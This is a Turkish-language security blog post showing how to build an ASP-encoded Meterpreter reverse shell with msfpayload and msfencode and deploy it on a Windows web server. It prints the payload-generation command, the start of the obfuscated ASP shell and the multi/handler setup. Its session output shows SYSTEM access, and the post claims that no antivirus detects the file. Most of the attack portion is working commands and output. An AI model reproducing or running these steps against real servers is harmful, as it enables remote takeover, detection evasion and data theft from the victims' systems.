ASP encode ile reverse shell – msfencode

Windows Web sunuculara yapılan ataklar sonrası, saldırgan sistemde bir arkakapı oluşturmak, sistemde komut çalıştırmak ve yetki yükseltmek için çeşitli web tabanlı scriptler kullanırlar.Bilinen en meşhurları arasında cyberspy5.asp , zehir4.asp, efso.asp ve  .net ile yazılmış FSO (file system object) fonksiyonlarını kullanan yazılımlar bulunuyor. Bu tür yazılımların ortak özelliği, FSO kullanarak dosya dizin işlemlerini gerçekleştirmek, sistemde komut çalıştırmak, port açabilmek ve uzak bir sisteme bağlantı gerçekleştirebilmektir.

Bu kadar bilinir olmaları antivirus, kaçak giriş tespit sistemleri  ve wep application firewall’lar tarafından kolayca engellenmelerine olanak sağlıyor.

Metasploit Exploit Framework ile, msfpayload ve msfencode yardımcı araçları kullanılarak meterpreter payloadını asp olarak encode edip  bind shell veya reverse shell bağlantısı kurulabilir.

Bu örnekte ters bağlantı (reverse connetion) kullanılmıştır.

# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 R | ./msfencode -t asp -o ajan443.asp

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

 

ajan443.asp dosyasını asp destekli bir windows sunucuya yükleyip, sayfa çağrıldığında kurban sistemden saldırgan sistemin 443. Portuna bağlantı kurarak kurban sistemin komut satırını saldırgana teslim edecektir.

 

# cat ajan443.asp

<%

Sub CnpnKLRtlY()

ZkMSe=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)
…..

…..

 

Saldırgan metasploit aracılığı ile meterpreter bağlantısını karşılamak üzere dinleme moduna geçer ve hedefte ajan443.asp dosyası çalıştırıldığında bağlantı gerçekleştirilmiş olur.

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.2

LHOST => 192.168.1.2

msf exploit(handler) > set LPORT 443

LPORT => 443

msf exploit(handler) > exploit

 

[*] Started reverse handler on 192.168.1.2:443

[*] Starting the payload handler…

[*] Sending stage (749056 bytes) to 192.168.1.5

[*] Meterpreter session 1 opened (192.168.1.2:443 -> 192.168.1.5:1064) at Tue May 10 06:58:24 -0400 2011

 

meterpreter > getuid

Server username: NT AUTHORITYSYSTEM

 

Ve hedefte SYSTEM yetkileri ile komut satırını ele geçirmiş olduk.Hedef sistemden ekran görüntüsü alabilir, dosya/dizin işlemelerini gerçekleştirebilir, keylogger/trojan kurabilir, upload/download vb. bir çok işlem gerçekleştirilebilir.

 

Meterpreter içeriği encode edildiği için antivirusler tarafından da tanınmaz. Bu yazı yayımlandığı tarihte virustotal.com tarama sonucu

Hiç bir antivirus tarafından tanınmıyor.

Yazar:
Ozan UÇAR
ozan.ucar@bga.com.tr